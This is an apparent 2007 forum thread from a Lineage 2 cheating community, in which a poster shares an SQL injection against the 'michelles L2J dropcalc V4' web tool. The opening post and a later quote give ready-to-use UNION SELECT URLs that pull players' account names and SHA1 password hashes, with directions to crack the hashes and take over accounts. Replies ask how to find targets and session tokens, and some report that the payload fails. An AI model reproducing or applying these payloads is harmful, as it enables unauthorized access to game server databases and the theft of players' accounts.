raouf67 Posted November 6, 2007 Posted November 6, 2007 This concerns only The michelles L2J dropcalc V4 SQL Injection: !! You must be logged in, using your own username and Token !! Obtain a player username with sql injection : http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]" !! you must put the token, User and PLAYER without the "[]" !! Obtain a password for that username (encrypted with SHA1) : -- > !! only valid if loginserver and gameserver are in the same machine !! http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]" Then you have the password encrypted in SHA1 :) You must decrypt it (don't worry it's easy) Go Here --> http://md5encryption.com/ Now you have the password of the player ;D
ADAL13 Posted November 6, 2007 Posted November 6, 2007 eh where do you put it? on the ms-dos command console? and what do i put in target and path? Thnks
dejvis Posted November 6, 2007 Posted November 6, 2007 so on server site there must be implanted "michelles L2J dropcalculator" version 4? what about [Target]/[Path]? by [Token] u mean server token? oh and what about [PLAYER]? ADAL13 u put it in adress at your web browser
Blitztrager Posted November 6, 2007 Posted November 6, 2007 A little bit old as it was reported at the end of January. However you provided a guide "How to" so thanks a lot for sharing. Could you hide this post so everybody with 100 and more post will be able to see it? What token do you mean? Token which allow you to play on L2 server? The same which you use to run L2Walker? Thanks [EDIT] PLAYER mean character name I suppose.
raouf67 Posted November 6, 2007 Author Posted November 6, 2007 Token doesn't mean server token but session token. When you login in l2j Michelle dropcalc, you have a session token that's it. Target is the link (url) of the database ;)
knoxville Posted November 6, 2007 Posted November 6, 2007 Very nice info.... > !! only valid if loginserver and gameserver are in the same machine !! -> pay atention...
NiGGaZ Posted November 6, 2007 Posted November 6, 2007 I Didnt get it raouf can u pm me and explain to me plz :D?Although THX FOR THE SHARE!!!
Topa Posted November 6, 2007 Posted November 6, 2007 how we can know if the database is michelle dropcalc? abd how we get the session token and the url of the database? i didint understand it too.. pm me too if u can thnx
5n4k3 Posted November 6, 2007 Posted November 6, 2007 How can i get TOKEN from michelle dropcalc ?? Thanks
Blitztrager Posted November 7, 2007 Posted November 7, 2007 @raouf67 I tried it on few servers. Always I am getting "Please give at least 3 characters." so something is wrong with this sql code. I am sure I checked servers where dropcalc is v4. Can't check if login and game server are on the same machine but I think it is. "[PLAYER]" means character name in game?
BaFoMeT Posted November 7, 2007 Posted November 7, 2007 http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]" !! you must put the token, User and PLAYER without the "[]" !! Obtain a password for that username (encrypted with SHA1) : -- > !! only valid if loginserver and gameserver are in the same machine !! http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]" Then you have the password encrypted in SHA1 :) You must decrypt it (don't worry it's easy) Go Here --> http://md5encryption.com/ I have few questions: 1.Token. The same token as for l2 walkers? or from mysql sessions? 2.The michelles L2J dropcalc V4. On what l2 version is this db used c4,c5,interlude? 3.Does this work for anyone?
dag0 Posted November 7, 2007 Posted November 7, 2007 nice info but i dunno what is token, l2walker token¿
Blitztrager Posted November 7, 2007 Posted November 7, 2007 I have few questions: 1.Token. The same token as for l2 walkers? or from mysql sessions? 2.The michelles L2J dropcalc V4. On what l2 version is this db used c4,c5,interlude? 3.Does this work for anyone? 1. As raouf67 said "Token doesn't mean server token but session token. When you login in l2j Michelle dropcalc, you have a session token that's it." 2. As far I found C4 and one C5 server which are using l2j dropcalc V4 3. Not working for me as I am getting weird message ""Please give at least 3 characters.""
Recommended Posts